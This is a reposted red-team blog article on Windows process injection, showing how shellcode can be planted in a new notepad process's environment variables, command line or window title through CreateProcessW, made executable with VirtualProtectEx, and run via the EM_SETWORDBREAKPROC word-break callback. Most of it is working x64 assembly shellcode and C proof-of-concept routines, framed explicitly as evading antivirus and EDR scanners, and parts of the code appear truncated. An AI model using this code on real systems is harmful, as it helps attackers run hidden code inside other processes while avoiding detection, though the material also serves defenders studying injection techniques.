Windows Process Injection: Command Line and Environment Variables
2020-07-31 13:00:38 Author:查看原文) 阅读量:75 收藏

Windows Process Injection: Command Line and Environment Variables


  1. Introduction
  2. Shellcode
  3. Environment Variables
  4. Command Line
  5. Window Title
  6. Runtime Data

1. Introduction

There are many ways to load shellcode into the address space of a process, but knowing precisely where it’s stored in memory is a bigger problem when we need to execute it. Ideally, a Red Teamer will want to locate their code with the least amount of effort, avoiding memory scrapers/scanners that might alert an antivirus or EDR solution. Adam discussed some ways to avoid using VirtualAllocEx and WriteProcessMemory in a blog post, Inserting data into other processes’ address space. Red Teamers are known to create a new process before injecting data, but I’ve yet to see any examples of using the command line or environment variables to assist with this.

This post examines how CreateProcessW might be used to both start a new process AND inject data simultaneously. Memory for where the data resides will initially have Read-Write (RW) permissions, but this can be changed to Read-Write-Execute (RWX) using VirtualProtectEx. Since notepad will be used to demonstrate these techniques, Wordwarping / EM_SETWORDBREAKPROC is used to execute the shellcode. The main structure of memory being modified for these examples is RTL_USER_PROCESS_PARAMETERS that contains the Environment block, the CommandLine and C RuntimeData information, all of which can be controlled by an actor prior to creation of a new process.

    ULONG MaximumLength;                            //0x0
    ULONG Length;                                   //0x4
    ULONG Flags;                                    //0x8
    ULONG DebugFlags;                               //0xc
    PVOID ConsoleHandle;                            //0x10
    ULONG ConsoleFlags;                             //0x18
    PVOID StandardInput;                            //0x20
    PVOID StandardOutput;                           //0x28
    PVOID StandardError;                            //0x30
    CURDIR CurrentDirectory;                        //0x38
    UNICODE_STRING DllPath;                         //0x50
    UNICODE_STRING ImagePathName;                   //0x60
    UNICODE_STRING CommandLine;                     //0x70
    PVOID Environment;                              //0x80
    ULONG StartingX;                                //0x88
    ULONG StartingY;                                //0x8c
    ULONG CountX;                                   //0x90
    ULONG CountY;                                   //0x94
    ULONG CountCharsX;                              //0x98
    ULONG CountCharsY;                              //0x9c
    ULONG FillAttribute;                            //0xa0
    ULONG WindowFlags;                              //0xa4
    ULONG ShowWindowFlags;                          //0xa8
    UNICODE_STRING WindowTitle;                     //0xb0
    UNICODE_STRING DesktopInfo;                     //0xc0
    UNICODE_STRING ShellInfo;                       //0xd0
    UNICODE_STRING RuntimeData;                     //0xe0
    RTL_DRIVE_LETTER_CURDIR CurrentDirectores[32];  //0xf0
    ULONG EnvironmentSize;                          //0x3f0

2. Shellcode

User-supplied shellcodes that contain two consecutive null bytes (\x00\x00) would require an encoder and decoder, such as Base64. The following code resolves the address of CreateProcessW and executes a command supplied by the word break callback. The PoC will set the command using WM_SETTEXT.

      bits 64
      %include ""
      struc stk_mem
        .hs                   resb home_space_size
        .bInheritHandles      resq 1
        .dwCreationFlags      resq 1
        .lpEnvironment        resq 1
        .lpCurrentDirectory   resq 1
        .lpStartupInfo        resq 1
        .lpProcessInformation resq 1
        .procinfo             resb PROCESS_INFORMATION_size
        .startupinfo          resb STARTUPINFO_size

      %define stk_size ((stk_mem_size + 15) & -16) - 8
      %ifndef BIN
        global createproc
      ; void createproc(WCHAR cmd[]);
      ; save non-volatile registers
      pushx  rsi, rbx, rdi, rbp
      ; allocate stack memory for arguments + home space
      xor    eax, eax
      mov    al, stk_size
      sub    rsp, rax
      ; save pointer to buffer
      push   rcx
      push   TEB.ProcessEnvironmentBlock
      pop    r11
      mov    rax, [gs:r11]
      mov    rax, [rax+PEB.Ldr]
      mov    rdi, [rax+PEB_LDR_DATA.InLoadOrderModuleList + LIST_ENTRY.Flink]
      jmp    scan_dll
      mov    rdi, [rdi+LDR_DATA_TABLE_ENTRY.InLoadOrderLinks + LIST_ENTRY.Flink]
      mov    rbx, [rdi+LDR_DATA_TABLE_ENTRY.DllBase]

      mov    esi, [rbx+IMAGE_DOS_HEADER.e_lfanew]
      add    esi, r11d             ; add 60h or TEB.ProcessEnvironmentBlock
      mov    ecx, [rbx+rsi+IMAGE_NT_HEADERS.OptionalHeader + \
                           IMAGE_OPTIONAL_HEADER.DataDirectory + \
                           IMAGE_DIRECTORY_ENTRY_EXPORT * IMAGE_DATA_DIRECTORY_size + \
                           IMAGE_DATA_DIRECTORY.VirtualAddress - \
      jecxz  next_dll              ; if no exports, try next DLL in list
      ; rsi = offset IMAGE_EXPORT_DIRECTORY.Name 
      lea    rsi, [rbx+rcx+IMAGE_EXPORT_DIRECTORY.NumberOfNames]
      lodsd                        ; eax = NumberOfNames
      xchg   eax, ecx
      jecxz  next_dll              ; if no names, try next DLL in list
      ; r8 = IMAGE_EXPORT_DIRECTORY.AddressOfFunctions
      xchg   eax, r8d              ;
      add    r8, rbx               ; r8 = RVA2VA(r8, rbx)
      ; ebp = IMAGE_EXPORT_DIRECTORY.AddressOfNames
      xchg   eax, ebp              ;
      add    rbp, rbx              ; rbp = RVA2VA(rbp, rbx)
      ; r9 = IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals      
      xchg   eax, r9d
      add    r9, rbx               ; r9 = RVA2VA(r9, rbx)
      mov    esi, [rbp+rcx*4-4]    ; rax = AddressOfNames[rcx-1]
      add    rsi, rbx
      xor    eax, eax
      add    edx, eax
      ror    edx, 8
      dec    al
      jns    hash_api
      cmp    edx, 0x1b929a47       ; CreateProcessW
      loopne find_api              ; loop until found or no names left
      jnz    next_dll              ; not found? goto next_dll
      movzx  eax, word[r9+rcx*2]   ; eax = AddressOfNameOrdinals[rcx]
      mov    eax, [r8+rax*4]
      add    rbx, rax              ; rbx += AddressOfFunctions[rdx]
      ; CreateProcess(NULL, cmd, NULL, NULL, 
      ;   FALSE, 0, NULL, &si, &pi);
      pop    rdx           ; lpCommandLine = buffer for Edit
      xor    r8, r8        ; lpProcessAttributes = NULL
      xor    r9, r9        ; lpThreadAttributes = NULL
      xor    eax, eax
      mov    [rsp+stk_mem.bInheritHandles     ], rax ; bInheritHandles      = FALSE
      mov    [rsp+stk_mem.dwCreationFlags     ], rax ; dwCreationFlags      = 0
      mov    [rsp+stk_mem.lpEnvironment       ], rax ; lpEnvironment        = NULL
      mov    [rsp+stk_mem.lpCurrentDirectory  ], rax ; lpCurrentDirectory   = NULL
      lea    rdi, [rsp+stk_mem.procinfo       ]
      mov    [rsp+stk_mem.lpProcessInformation], rdi ; lpProcessInformation = &pi

      lea    rdi, [rsp+stk_mem.startupinfo    ]
      mov    [rsp+stk_mem.lpStartupInfo       ], rdi ; lpStartupInfo        = &si
      xor    ecx, ecx
      push   STARTUPINFO_size
      pop    rax
      stosd                         ; si.cb = sizeof(STARTUPINFO)
      sub    rax, 4
      xchg   eax, ecx
      rep    stosb
      call   rbx
      ; deallocate stack
      xor    eax, eax
      mov    al, stk_size
      add    rsp, rax
      xor    eax, eax
      ; restore non-volatile registers
      popx   rsi, rbx, rdi, rbp  

3. Environment Variables

Part of Unix since 1979 and MS-DOS/Windows since 1982. According to MSDN, the maximum size of a user-defined variable is 32,767 characters. 32KB should be sufficient for most shellcode, but if not, you have the option of using multiple variables for anything else.

There’s a few ways to inject using variables, but I found the easiest approach to be setting one in the current process with SetEnvironmentVariable, and then allowing CreateProcessW to transfer or propagate all of them to the new process by setting the lpEnvironment parameter to NULL.

    // generate random name
    for(i=0; i<MAX_NAME_LEN; i++) {
      name[i] = ((rand() % 2) ? L'a' : L'A') + (rand() % 26);
    // set variable in this process space with our shellcode
    SetEnvironmentVariable(name, (PWCHAR)WINEXEC);
    // create a new process using 
    // environment variables from this process
    ZeroMemory(&si, sizeof(si));
    si.cb          = sizeof(si);
    si.dwFlags     = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWDEFAULT;
    CreateProcess(NULL, L"notepad", NULL, NULL, 
      FALSE, 0, NULL, NULL, &si, &pi);

Variable names are stored in memory alphabetically and will appear in the same order for the new process so long as lpEnvironment for CreateProcess is set to NULL. The PoC here will locate the address of the shellcode inside the current environment block, then subtract the base address to obtain the relative virtual address (RVA).

// return relative virtual address of environment block
DWORD get_var_rva(PWCHAR name) {
    PVOID  env;
    PWCHAR str, var;
    DWORD  rva = 0;
    // find the offset of value for environment variable
    env = NtCurrentTeb()->ProcessEnvironmentBlock->ProcessParameters->Environment;
    str = (PWCHAR)env;
    while(*str != 0) {
      // our name?
      if(wcsncmp(str, name, MAX_NAME_LEN) == 0) {
        var = wcsstr(str, L"=") + 1;
        // calculate RVA of value
        rva = (PBYTE)var - (PBYTE)env;
      // advance to next entry
      str += wcslen(str) + 1;
    return rva;

Once we have the RVA for local process, read the address of environment block in remote process and add the RVA.

// get the address of environment block
PVOID var_get_env(HANDLE hp, PDWORD envlen) {
    NTSTATUS                    nts;
    PEB                         peb;
    ULONG                       len;
    SIZE_T                      rd;

    // get the address of PEB
    nts = NtQueryInformationProcess(
        hp, ProcessBasicInformation,
        &pbi, sizeof(pbi), &len);
    // get the address RTL_USER_PROCESS_PARAMETERS
      hp, pbi.PebBaseAddress,
      &peb, sizeof(PEB), &rd);
    // get the address of Environment block 
      hp, peb.ProcessParameters,
      &upp, sizeof(RTL_USER_PROCESS_PARAMETERS), &rd);

    *envlen = upp.EnvironmentSize;
    return upp.Environment;

The full routine will copy the user-supplied command to the Edit control and the shellcode will receive this when the word break callback is executed. You don’t need to use Notepad, but I just wanted to avoid the usual methods of executing code via RtlCreateUserThread or CreateRemoteThread. Figure 1 shows the shellcode stored as an environment variable. See var_inject.c for more detals.

Figure 1. Environment variable of new process containing shellcode.

void var_inject(PWCHAR cmd) {
    STARTUPINFO         si;
    WCHAR               name[MAX_PATH]={0};    
    INT                 i; 
    PVOID               va;
    DWORD               rva, old, len;
    PVOID               env;
    HWND                npw, ecw;

    // generate random name
    for(i=0; i<MAX_NAME_LEN; i++) {
      name[i] = ((rand() % 2) ? L'a' : L'A') + (rand() % 26);
    // set variable in this process space with our shellcode
    SetEnvironmentVariable(name, (PWCHAR)WINEXEC);
    // create a new process using 
    // environment variables from this process
    ZeroMemory(&si, sizeof(si));
    si.cb          = sizeof(si);
    si.dwFlags     = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWDEFAULT;
    CreateProcess(NULL, L"notepad", NULL, NULL, 
      FALSE, 0, NULL, NULL, &si, &pi);
    // wait for process to initialize
    // if you don't wait, there can be a race condition
    // reading the correct Environment address from new process    
    WaitForInputIdle(pi.hProcess, INFINITE);
    // the command to execute is just pasted into the notepad
    // edit control.
    npw = FindWindow(L"Notepad", NULL);
    ecw = FindWindowEx(npw, NULL, L"Edit", NULL);
    SendMessage(ecw, WM_SETTEXT, 0, (LPARAM)cmd);
    // get the address of environment block in new process
    // then calculate the address of shellcode
    env = var_get_env(pi.hProcess, &len);
    va = (PBYTE)env + get_var_rva(name);

    // set environment block to RWX
    VirtualProtectEx(pi.hProcess, env, 
      len, PAGE_EXECUTE_READWRITE, &old);

    // execute shellcode
    SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)va);
    SendMessage(ecw, WM_LBUTTONDBLCLK, MK_LBUTTON, (LPARAM)0x000a000a);
    // cleanup and exit
    SetEnvironmentVariable(name, NULL);
    if(pi.hProcess != NULL) {

4. Command Line

This can be easier to work with than environment variables. For this example, only the shellcode itself is used and that can be located easily in the PEB.

    #define NOTEPAD_PATH L"%SystemRoot%\\system32\\notepad.exe"

    ExpandEnvironmentStrings(NOTEPAD_PATH, path, MAX_PATH);
    // create a new process using shellcode as command line
    ZeroMemory(&si, sizeof(si));
    si.cb          = sizeof(si);
    si.dwFlags     = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWDEFAULT;
    CreateProcess(path, (PWCHAR)WINEXEC, NULL, NULL, 
      FALSE, 0, NULL, NULL, &si, &pi);

Reading is much the same as reading environment variables since they both reside inside RTL_USER_PROCESS_PARAMETERS.

// get the address of command line
PVOID get_cmdline(HANDLE hp, PDWORD cmdlen) {
    NTSTATUS                    nts;
    PEB                         peb;
    ULONG                       len;
    SIZE_T                      rd;

    // get the address of PEB
    nts = NtQueryInformationProcess(
        hp, ProcessBasicInformation,
        &pbi, sizeof(pbi), &len);
    // get the address RTL_USER_PROCESS_PARAMETERS
      hp, pbi.PebBaseAddress,
      &peb, sizeof(PEB), &rd);
    // get the address of command line 
      hp, peb.ProcessParameters,
      &upp, sizeof(RTL_USER_PROCESS_PARAMETERS), &rd);

    *cmdlen = upp.CommandLine.Length;
    return upp.CommandLine.Buffer;

Figure 2 illustrates what Process Explorer might show for the new process. See cmd_inject.c for more detals.

Figure 2. Command line of new process containing shellcode.

#define NOTEPAD_PATH L"%SystemRoot%\\system32\\notepad.exe"

void cmd_inject(PWCHAR cmd) {
    STARTUPINFO         si;
    WCHAR               path[MAX_PATH]={0};
    DWORD               rva, old, len;
    PVOID               cmdline;
    HWND                npw, ecw;

    ExpandEnvironmentStrings(NOTEPAD_PATH, path, MAX_PATH);
    // create a new process using shellcode as command line
    ZeroMemory(&si, sizeof(si));
    si.cb          = sizeof(si);
    si.dwFlags     = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWDEFAULT;
    CreateProcess(path, (PWCHAR)WINEXEC, NULL, NULL, 
      FALSE, 0, NULL, NULL, &si, &pi);
    // wait for process to initialize
    // if you don't wait, there can be a race condition
    // reading the correct command line from new process  
    WaitForInputIdle(pi.hProcess, INFINITE);
    // the command to execute is just pasted into the notepad
    // edit control.
    npw = FindWindow(L"Notepad", NULL);
    ecw = FindWindowEx(npw, NULL, L"Edit", NULL);
    SendMessage(ecw, WM_SETTEXT, 0, (LPARAM)cmd);
    // get the address of command line in new process
    // which contains our shellcode
    cmdline = get_cmdline(pi.hProcess, &len);
    // set the address to RWX
    VirtualProtectEx(pi.hProcess, cmdline, 
      len, PAGE_EXECUTE_READWRITE, &old);
    // execute shellcode
    SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)cmdline);
    SendMessage(ecw, WM_LBUTTONDBLCLK, MK_LBUTTON, (LPARAM)0x000a000a);

5. Window Title

IMHO, this is the best of three because the lpTitle field of STARTUPINFO only applies to console processes. If a GUI like notepad is selected, process explorer doesn’t show any unusual characters for various properties. Set lpTitle to the shellcode and CreateProcessW will inject. As with the other two methods, obtaining the address can be read via the PEB.

    // create a new process using shellcode as window title
    ZeroMemory(&si, sizeof(si));
    si.cb          = sizeof(si);
    si.dwFlags     = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWDEFAULT;
    si.lpTitle     = (PWCHAR)WINEXEC;

6. Runtime Data

Two fields (cbReserved2 and lpReserved2) in the STARTUPINFO structure are, according to Microsoft, “Reserved for use by the C Run-time” and must be NULL or zero prior to calling CreateProcess. The maximum amount of data that can be transferred into a new process is 65,536 bytes, but my experiment with it resulted in the new process failing to execute. The fault was in ucrtbase.dll likely because lpReserved2 didn’t point to the data it expected.

While it didn’t work for me, that’s not to say it can’t work with some additional tweaking. Sources
